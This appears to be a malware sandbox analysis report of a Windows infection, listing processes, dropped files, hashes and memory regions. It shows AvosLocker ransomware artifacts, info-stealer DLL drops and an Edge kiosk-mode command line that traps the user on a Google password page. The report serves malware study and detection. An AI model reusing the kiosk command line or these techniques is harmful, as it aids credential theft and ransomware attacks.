"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Users\Admin\AppData\Local\Temp\a\ywp.exe

"C:\Users\Admin\AppData\Local\Temp\a\ywp.exe"

C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe

C:\Users\Admin\AppData\Local\Temp\0e8d0864aa\svoutse.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f5de46f8,0x7ff9f5de4708,0x7ff9f5de4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password

C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe

"C:\Users\Admin\AppData\Local\Programs\PCV Convert Manager\pdfconv.exe"


Network


Files

C:\Users\Admin\AppData\Local\Temp\a\pclient.exe

C:\Users\Admin\AppData\Local\Temp\a\s.exe

C:\Users\Admin\AppData\Local\Temp\a\v.exe

C:\Users\Admin\AppData\Local\Temp\a\l.exe

C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe

C:\Users\Admin\AppData\Local\Temp\a\fugu.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34lvgjda.kxu.ps1

C:\GET_YOUR_FILES_BACK.txt

C:\Users\Admin\AppData\Local\Temp\a\66dd9bfe41964_w9.exe

C:\Users\Admin\AppData\Local\Temp\a\66dcab0bcba58_crypted.exe

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Temp\a\66dd2c2d3b88f_opera.exe

C:\Users\Admin\AppData\Local\Temp\a\66dcad8f5f33a_crypted.exe

C:\ProgramData\mozglue.dll

C:\ProgramData\nss3.dll

C:\ProgramData\CGHCGIIDGDAK\KKFHJJ

C:\ProgramData\CGHCGIIDGDAK\HDBKJE

C:\ProgramData\vcruntime140.dll

C:\ProgramData\softokn3.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\freebl3.dll

C:\ProgramData\CGHCGIIDGDAK\JKEHII

C:\ProgramData\JEGDGIIJJE.exe

C:\Users\Admin\Desktop\GetHide.emf.avos2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Temp\a\Installer.exe

C:\Users\Admin\AppData\Local\Temp\1000033001\3ebb97c342.exe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\throttle_store.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AAEBAKKJKK.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\settings.dat

MD5 b294047e57e6fdaa62aee0a81c2cb43f
SHA1 d25f879c1db50ffbf8fc15feb2184bb913b4f1b8
SHA256 b81e0f982bc81f1eb081fc7741d8d43b3b90035bd51bf104c6202d8830da02a6
SHA512 389a4bd6e01d6f133cf28f4fc2908543be5559a756469903a9e9b395f2d1d27456cb4a6622e0fae0c61c8f89239cab0d3a750dc893c421917ca2b72898979c24

memory/21060-23113-0x0000000000750000-0x0000000000C0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\66d9f685932be_uninstaller.exe

MD5 fdf999d19df6b5c6a03bdbe1990347b3
SHA1 3266aa1f4ee746d69601c42afcda7666efd08ea2
SHA256 7a15dd944f05b7280ae9d297f7707f5ee712821fbae770930bae1539cf9e0b4e
SHA512 3232b2b0e373104b0f3d31d0275e0d40d247abd3b3fc288cc75d29ed26161726d31728f7ac25a771b277f74fe9a274346820f7087596caf6184ea7c7ce340274

C:\Users\Admin\AppData\Local\Temp\edge_shutdown_crash.txt

MD5 06d49632c9dc9bcb62aeaef99612ba6b
SHA1 e91fe173f59b063d620a934ce1a010f2b114c1f3
SHA256 e79e418e48623569d75e2a7b09ae88ed9b77b126a445b9ff9dc6989a08efa079
SHA512 849b2f3f63322343fddc5a3c8da8f07e4034ee4d5eb210a5ad9db9e33b6aec18dea81836a87f9226a4636c6c77893b0bd3408f6d1fe225bb0907c556a8111355

memory/15928-23128-0x0000000000400000-0x0000000000452000-memory.dmp

memory/21060-23127-0x0000000000750000-0x0000000000C0A000-memory.dmp

memory/15928-23132-0x0000000005740000-0x00000000057D2000-memory.dmp

memory/15928-23130-0x0000000005C50000-0x00000000061F4000-memory.dmp

memory/15928-23134-0x0000000005730000-0x000000000573A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpD8A8.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/15928-23151-0x0000000006380000-0x00000000063F6000-memory.dmp

memory/15928-23154-0x0000000006B00000-0x0000000006B1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\66d9f6e9330e4_deep.exe

MD5 6a94b94ba557d5d85a1da20213d48974
SHA1 a311aa3a9243849b883867fa3d772e4c4e95d080
SHA256 e4a125aa374a939c07ee3172dd5cdb23990096efe7059e9d647f1eaadc32e3dd
SHA512 a246f8f4341a144f4946179c518fea833dbec7e40c69023e10687f85d97c28e1851334f20260069c0d6500ecb859c2e2553b4492cda22c6145966bc893a54c74

memory/15928-23164-0x0000000006BD0000-0x0000000006BE2000-memory.dmp

memory/15928-23166-0x0000000006DA0000-0x0000000006DEC000-memory.dmp

memory/15328-23169-0x000002629AF70000-0x000002629AFAC000-memory.dmp

memory/15328-23168-0x0000026282720000-0x0000026282732000-memory.dmp

memory/15328-23167-0x00000262826B0000-0x00000262826CE000-memory.dmp

memory/15928-23165-0x0000000006C30000-0x0000000006C6C000-memory.dmp

memory/15928-23163-0x0000000006C90000-0x0000000006D9A000-memory.dmp

memory/15928-23162-0x0000000007140000-0x0000000007758000-memory.dmp

memory/13336-23179-0x0000000140000000-0x000000014000E000-memory.dmp

memory/13336-23178-0x0000000140000000-0x000000014000E000-memory.dmp

memory/13336-23177-0x0000000140000000-0x000000014000E000-memory.dmp

memory/19728-23198-0x0000000000260000-0x00000000008EE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 4e7521beb1ffe91d22551b0488a96c6c
SHA1 82ad3588f9ae5e9012458b6ce7b66fea0a272734
SHA256 eb30c3e85fc9e3a848d52c6d21ce8696eca4422c0eb19c185f6c514873c47fa7
SHA512 7789e30bb39d4e8fb05e364ec048c6ffcdd9286ec86d6bf86e8f6e577025a5613601eefe735bc53e7043ed433de75ace05f46326eeb3aca800b2c7cd9a076f1b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\aa1b87ef-357b-48c3-a384-1d0967da554a.dmp

MD5 3d609a3749c1550ec824ad4391da4c7b
SHA1 275ba208bc81673b11ced03df0181c542c5bbba3
SHA256 811803409dc81f578777615ebd39c0cade3bf0fc234e04aa6604446178fe1997
SHA512 562959d1634f46351a047244f50b47a0dc0f906c171243725422e2e8d0e16617fb8bc504965e2dabcb274f98ec894a84ab5b50eba5d989d383e4a0f6c416f782

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\watson_metadata

MD5 13b739e31979f1d1680bc1c75b95101d
SHA1 861403baa82e9fa7a6f2901504486e252a01dacd
SHA256 e445cc56f5c47ed2d1da66c58a4446ac002db069163ba9ef873cda1567be97a6
SHA512 f541d9c6ef9fbdda577422e208c3ff7c7444aaba9c15818fe4b7df22ab0f571d6666ab5b264ead6f709cab1ffb478aec43637b2658c5d6f5ce316109e2de89db

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 ab69cc1475aab17afdfbad6e9c47765d
SHA1 a3c3cc9c075ad509c519a9d072910224b4873ebb
SHA256 15764cd4b081c7f9615b4c424ffae9f33c8c31999d278bd68e572f8cdf15ae56
SHA512 a2711df04db532a6937bc990beebb1754a121017d4343dedb3b217f9fa4d375e2bc1497609f45d2a62471c3cd6ebeac510125b7ee8d840d8afe690901b7863c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\ec10c213-ebc5-41cc-bd59-4eed611dd295.dmp

MD5 118deea38a6032a9f55427d8765361db
SHA1 a609af986805b836ac57ec7f6b12e33e1ecf6939
SHA256 4e00f054109e0006b011910e54a3051d77d6644b8d73b8f39b589e4d42fc5cc8
SHA512 331059c475f2977016cf8dd97701f7e7cc736b96c402e16848b5f226eb6339945baec05f6d21349757d27e57c3a1075d2dc958c0fd8c90a67c4ea3779ac80ac0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 aadaa79ae0d07ee9e1e05f2b8e1128ca
SHA1 949e8c49510f59f209c09ebecbb56617c9dff1c8
SHA256 c984fbb3678e06cb682dde5efeabddb85c50275257066da064587db2a0ef7fb3
SHA512 ab46d8b3ab191b8922c6121508526db0ff50e363f77f8e050262d0c855643db432fa9c7567fd59bb1a37d36d7e27c94c70e484c49b0b2aaf3c0ca473ece10274

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\55e5fd4d-1bc1-4ad4-8444-c4ab4ab6fa70.dmp

MD5 6f26608df6a4afa078e8bc2eab72934c
SHA1 a025fd00e26dde0541b1f9e50b021a67433c8964
SHA256 8c8c875d8d63e64da54a4d9de44436f50e9cfc7fb0eafeabbb87d5cb20572b61
SHA512 79ae7db1422b01deae38d445be693982f8246a0b29e07f8410a27542835a96e1759d630bc9f59ea0b4c99aacbd010a5d191017a46813264e5e8ff9d84d6ea2e4

C:\ProgramData\JJDBAAEGDBKK\CAKKJK

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 3378935712e8c1cd4a3cd73395ce68c9
SHA1 8292248dca12838830955320b0021cd4ce5f5453
SHA256 958ee6ba7c1dab6a313edf778f496b01ff1d32bf0b70eb228334d76c22493a87
SHA512 1257742bd4aae45eaee995feef6de2c18eddb7df39718f74018d6d21e095d399295c47efb3de6556669bed036b570656c689cc6718dd04549f6634ce29b4b4f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\456e97f3-a6cd-4061-b263-432d44e6a351.dmp

MD5 cc574fcfb0d651a647b365d654c7d02a
SHA1 d26e3ebda76d79b77427acf1554d44552695cc45
SHA256 a264ac16ede5af9b74693ba89d9636ae0e8adc54d6b2081b2b8ba9e2b198c453
SHA512 da2abb5e5087a19167b4ce141b90ec9e478c1e52f05f5938b72238648cb886a7efe826643da1d8c3d41dc0cc600f35c75305170b35444f8ce07484b7bc40c8ac

C:\ProgramData\JJDBAAEGDBKK\IDAEBG

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\ProgramData\JJDBAAEGDBKK\IDAEBG

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\55af97d2-e0ae-4471-8c6f-217b2f509859.dmp

MD5 ab1ac515e47b7322a005a1756a8d8671
SHA1 e88be915f484695572bdd4de0c706a328d27766c
SHA256 58340a0e9d03cd27882d62367fdbdcc04f9bb0438d86e88dc8eafdd3d040a98f
SHA512 3a9221693410eaf1ad9388b0208060fdf9009cd7bc9db4f9cf76c7376abd9ae09a4c6ef6a759ddbdee611428c4bc55709222f039c50e4b55e26b1ef3daec315e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 6a15a6fac1988531bd322acfc95f7732
SHA1 c7fce77d9ef972797eabf08bd6893abfa0565c63
SHA256 30c83c1e2f76fa1186d14943d3bb716bf381069b80a4aa5eb191d10ad7cb8e00
SHA512 c20c00b84d29c00319747b57351294b261f0decb8a5dfefb4a53bd46e54fcde868e67df15fee06eb41c30281bca89160de8111b5963a3a8e7ffb2d6077369c7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 3cbd2ce34cf8e4084f7aea003aa3f933
SHA1 2aebd8b6836c03b22c3bb802fc4707b9e84e0926
SHA256 a06bbdaf75ce8fb0e1649e8b97abe58699336711c58fbba1d2616b0a96642876
SHA512 b36577bf92db6a785a16e4cc802b2fadaa23b9e4198b689b90830ae338e9ea2b068cd1ab786f793aad14b0738dac3eef27d8860f562c19e3e0ec33e1289d4ed6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\97d7bdac-2a38-4a41-ab81-8fd60e0ef17e.dmp

MD5 869054d2c11e6b1990dddd1d3661cff0
SHA1 414c0fb506c4463b730a1158146d0039c8b66de6
SHA256 831340ed2f5f3c55c26aa97ee726b239be4675cf34496c8a573df5b2b4015495
SHA512 dc1a441bc68592f02a215bfd80c06d9605779917fecfdc43fd0f6e7e94ea63b0b1f0963c3eb22eeffc1ed40c0484580999dcf6860ed9b0765919bf7bd77dfba3

C:\Users\Admin\AppData\Local\Temp\a\66d9ddcb9dbfe_Build.exe

MD5 df763cc3afd7e98d660e5db9de5b1d95
SHA1 e50abf286735649267da3024aa27544eaf095845
SHA256 aee46fb12d8bd25b4033b3ef7fb04703961e68e6cbc40d6aa410b01b05e4b411
SHA512 a7622cf295023ca9073d3ae239b98268705f1b9ea850bc6c8f6db66f175b546df95a1dd4978bf376af4a6d4568ae0f78b66b3fa885a5146f6692a35c69b879c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 b7e9a3bd17230feb40caee7c16f71f11
SHA1 91353d058d2438e1ee5a2596e1c7d3e79b6bc153
SHA256 17cc61680a083b64297ed07840d6b8153d1315c7268ca86ad9b37517d4083474
SHA512 d5bc4ae673309da7f2fd0ee95de5ca8bc2da1e599f9c734875ffa26dd91945815a22e24c71d100525c8dc68a8e32986e5548c77dd474465a427f2df421e1d600

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\f557236a-8302-4d97-a087-203ac65f2eb6.dmp

MD5 f1d0d8a26229bdc0be15c1ff955ad34f
SHA1 a3d9d6534706c4eabba2104fe9404c80f7c0d3a4
SHA256 618953c1ce6a173dd2f16a8ee7a76c8268e741f59621f780f52dc201013b1c05
SHA512 2575231c50760f0162830d2daf577eb7a590458d2c58664394fee33112c22cc14d504c35d62a8832bba7fa92c8592a00bf138a1ae66cb79b95fb9f46b64e8cc4

C:\Users\Admin\AppData\Local\Temp\a\abQOhgu.exe

MD5 387d4b12ac9e87b9db76589fcca2b937
SHA1 4a51340e1817d7ab2c739b1237c541b58e3b7c9a
SHA256 30d91ef269ca652f181ba1985cf2cf8a5790305927c6887e0c298c38ae87afcf
SHA512 35bd0a53169d56a12260ec280977fdf0e3c07b41baa836a931667aaaeffebad902f7fb1b61b3d33072a02823a959a54a6327aed57580b970bc0bcee464cd4f87

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 c251965f2d3af87e21d766351dcf9e8d
SHA1 8cb9864ac87264228fa6ec2aa8af25276ee10d78
SHA256 174e6a498deac47f767923de085d4e219445f88a6997df065b02d7eb816d72a4
SHA512 a2a807f3f64fc0c797572e5fd8d9f9ecfb0250d11f6d39a06b29b5660e074a0f2a6f195a21536127349f9c955d3e0a888e02ea47f2d8c6d0bf25475756c57719

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\81919a83-847c-4d34-b747-09a64529b6c4.dmp

MD5 466836e189646335275f771abdcc685e
SHA1 ad043916b3f021b981e31503b31abc8436c8fe89
SHA256 b226ad49de8977c0547b6367796141b53a6fe81c36607bc7c7d85604d1faf965
SHA512 415f937cc9fa6ee7e89832603fd845b258962d979d9d0b54ef3a35fab4168df197c2c95ee4df5a6ea3eaa7d4382e07783565ac63e9630d3b6367573147ad8239

C:\Users\Admin\AppData\Local\Temp\a\notebyx.exe

MD5 7a8463b22eb60bf18f4df8444e006d96
SHA1 f1577856bf96eea03ba84a5fd85dfc9426d60def
SHA256 07dfcd4aad4d53de15bd688a17d31ce50d591173d60fa2cb629b9ed94179cc2a
SHA512 5bc787b6e6cc02c96481bfa87fa3336ba53aa596c1c4b053de40e18d400305481a7059a71c9ee9ad1e6ce3260a743860595a7cddbdbcffd7dfeb8eed06de9779

C:\Users\Admin\AppData\Local\Temp\a\Accounts.exe

MD5 8a4f0f41b42e3f0027066f418e5436c5
SHA1 3ce8dec5bcfd824805e40ec6f9d43ac45b6f029c
SHA256 a0b724fea63d02a4b665dfb5c047da345e949385758e6bdc20b3c42951c549e4
SHA512 19c0c02ba0fa3899f1f67cc19daab651a4384217cf81f50c3b3774cae09c5f2117bc2d43698866156e93a00948014345f96db1c8a637daf0a146862531ce3ef2

C:\Users\Admin\AppData\Local\Temp\a\Meeting.sfx.exe

MD5 1a679e0ccedfb2c3b8ebaf8d9b22f96a
SHA1 6ae0ff6690d0a857d145f671589a97620c1e43e5
SHA256 d16eb8da5c5ce99f1a2e38677eff8d2ae532cb1ad0eddf10a311583004675960
SHA512 8e60833f266f1a092846892659b117e06f96d5f7017ce0847333a7ae38f30b2a274bf6fe0ee43d5e94c1aa87a84ce340c4b66de256883bcf2bbc17038353a4d7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\metadata

MD5 460f20d51f93d7da79e5be4bc3134397
SHA1 0511f833b6c677d4332fc6d1d5179f4518f5b287
SHA256 a7f45af73296be18358e6e679a93d67e0e098a9bed8a84574ad9190566722046
SHA512 3d1670212246334467c1979d09bedbaeb10ab6b369a844578e4ab6d632061a1bbc3f5b2efd81955c9caf3a4cfcb02bafd04526c72b9b0da8593e42f4d2891742

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data Kiosk\Crashpad\reports\34e1b215-af8e-4750-a8af-d60db40e2ac5.dmp
